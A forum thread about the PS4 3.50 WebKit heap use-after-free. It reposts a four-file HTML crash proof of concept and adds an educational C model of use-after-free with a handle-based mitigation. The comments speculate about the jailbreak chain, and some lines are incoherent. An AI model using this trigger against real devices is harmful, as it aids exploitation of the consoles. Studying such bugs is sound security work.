Category: PS4 Jailbreaking | Thread starter: PSXHAX | Start date: May 21, 2016 at 3:38 PM | 30,348 | 49
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say, to quote: Hello. Appears this needs to be posted publicly... Not sure who felt the need to want fame for this, cough "Qwerty", but that's the last time I am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene, you can blame this guy for why, because I am no longer sharing anything.

Anywho, make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
        document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause an out-of-memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
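The PoC above belongs to the heap use-after-free class: an object is torn down while something else still holds a pointer to it, and the later access lands on freed (possibly reused) memory. As an added educational example, not Hunter128's code and not WebKit's, here is a small C model of that bug class. The frame pool, the names (frame_t, load_job_t, frame_ref_t) and the 4-slot arena are invented for the demonstration; the generation-checked handle is a general weak-reference mitigation, not a claim about how WebKit fixed this bug. The arena keeps the "freed" memory addressable so the stale read is defined behaviour and can be observed.

```c
#include <stdio.h>
#include <string.h>

/* Educational model of a heap use-after-free, added as an example; it is not
 * the PoC from the thread nor WebKit code. frame_t, load_job_t, frame_ref_t
 * and the 4-slot pool are invented for this demonstration. */

#define POOL_SLOTS 4
#define POISON 0xDD           /* byte pattern written into freed objects */

typedef struct {
    int id;
    unsigned char alive;      /* 1 while the object is valid */
    char url[32];
} frame_t;

/* A pending job that, in the unsafe variant, keeps a raw pointer to its frame. */
typedef struct { frame_t *frame; } load_job_t;

/* Generation-checked handle: the hardened variant stores this instead. */
typedef struct { int slot; unsigned gen; } frame_ref_t;

static frame_t       pool[POOL_SLOTS];
static unsigned char pool_used[POOL_SLOTS];
static unsigned      pool_gen[POOL_SLOTS];   /* bumped on every free */

static void pool_reset(void) {
    memset(pool, 0, sizeof pool);
    memset(pool_used, 0, sizeof pool_used);
    memset(pool_gen, 0, sizeof pool_gen);
}

/* Allocate the lowest free slot, so a just-freed slot is reused first. */
static frame_t *pool_alloc(int id, const char *url) {
    for (int i = 0; i < POOL_SLOTS; i++) {
        if (!pool_used[i]) {
            pool_used[i] = 1;
            pool[i].id = id;
            pool[i].alive = 1;
            snprintf(pool[i].url, sizeof pool[i].url, "%s", url);
            return &pool[i];
        }
    }
    return NULL;
}

/* Free a slot: poison it so a read through a stale pointer is obvious, and
 * bump the generation so stale handles stop resolving. */
static void pool_free(frame_t *f) {
    int i = (int)(f - pool);
    memset(f, POISON, sizeof *f);
    pool_used[i] = 0;
    pool_gen[i]++;
}

static frame_ref_t frame_ref(frame_t *f) {
    frame_ref_t r = { (int)(f - pool), pool_gen[f - pool] };
    return r;
}

/* Resolve a handle; NULL once the object was freed, even if the slot was reused. */
static frame_t *frame_resolve(frame_ref_t r) {
    if (r.slot < 0 || r.slot >= POOL_SLOTS) return NULL;
    return (pool_used[r.slot] && pool_gen[r.slot] == r.gen) ? &pool[r.slot] : NULL;
}

/* Unsafe variant: the job keeps a raw pointer, the frame is torn down (think:
 * the document is replaced while a child load is in flight), and the job then
 * reads through the dangling pointer. Returns the byte it saw. */
unsigned stale_read_unsafe(void) {
    pool_reset();
    load_job_t job = { pool_alloc(7, "1.html") };
    pool_free(job.frame);              /* frame gone, job.frame now dangles */
    return job.frame->alive;           /* sees poison (0xDD) instead of 1 */
}

/* Hardened variant: the job stores a generation-checked handle. Returns 1 if
 * the handle resolves while the frame is alive and fails after it is freed. */
int stale_read_checked(void) {
    pool_reset();
    frame_t *f = pool_alloc(7, "1.html");
    frame_ref_t ref = frame_ref(f);
    int live_id = frame_resolve(ref)->id;     /* 7 while alive */
    pool_free(f);
    return live_id == 7 && frame_resolve(ref) == NULL;
}

/* Worst case for a raw pointer: the slot is reused by a new object of the same
 * type, so a stale read returns plausible data. The handle still fails. */
int reuse_after_free_checked(void) {
    pool_reset();
    frame_t *a = pool_alloc(1, "2.html");
    frame_ref_t stale = frame_ref(a);
    pool_free(a);
    frame_t *b = pool_alloc(2, "3.html");     /* lands in the same slot as a */
    return b == a && frame_resolve(stale) == NULL
        && frame_resolve(frame_ref(b))->id == 2;
}

int main(void) {
    printf("raw pointer after free read alive=0x%02X (expected 1)\n", stale_read_unsafe());
    printf("handle after free resolves to NULL: %s\n", stale_read_checked() ? "yes" : "no");
    printf("handle after slot reuse resolves to NULL: %s\n", reuse_after_free_checked() ? "yes" : "no");
    return 0;
}
```

The poison write is what makes the first case visible at all: without it the stale read returns whatever the allocator left behind, which is exactly why real engines (and tools like ASan) poison or quarantine freed memory during testing. The third case is the one that matters for triage, since a reused slot makes the bug look like ordinary working code until the types no longer line up.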

Comments

sEKTOR

Developer(Team Ze0s)
Developer
Senior Member
Contributor
This method is easy, as I said earlier; the gap is there. While not one.
 

PLAYER 1

Senior Member
Contributor
So, today... what kind of code could be injected, what kind of homebrews could be created based on these findings???

I don't know the PS4 system, so could someone please explain it? Please.
Thanks.
 

Chaos Kid

Developer
Senior Member
Contributor
I think it is in this direction ->

Find a vuln -> if found, like the memory error -> check if the vuln is exploitable -> if so, it's a good sign -> next step: use an exploit of the vuln for an entry point -> entry point OK -> exploit for userland is needed -> if found -> use the exploit for userland to gain kernel access -> now we have kernel access, but another exploit is needed to gain root or run own code....

Just my thinking, it can be wrong; maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is OK....^^
This vulnerability is good; it does work with a few different ways I have tested so far. No need for code injection, and if you stay close with the original compiler you can literally crash the system and see the heap in memory and where the loc pointer should be directed.
Keep in mind I'm not just known for toolchains nor kernels; I dig out the info for what's usable and how it can work to come together.
Some information
This is very close to ode rigid body moving objects simulation.
 

Winchest

Senior Member
Contributor
I'm new here.
Just a simple question.

What do the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What do the devs need for a CFW like Rebug, for example?
 

mcmrc1

Senior Member
Contributor
Verified
I'm new here.
Just a simple question.

What do the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What do the devs need for a CFW like Rebug, for example?
First of all they need keys!!! To decrypt the firmware, change the files and encrypt them again so that the PS4 recognizes the firmware as a valid one....

Correct me if I am wrong....
 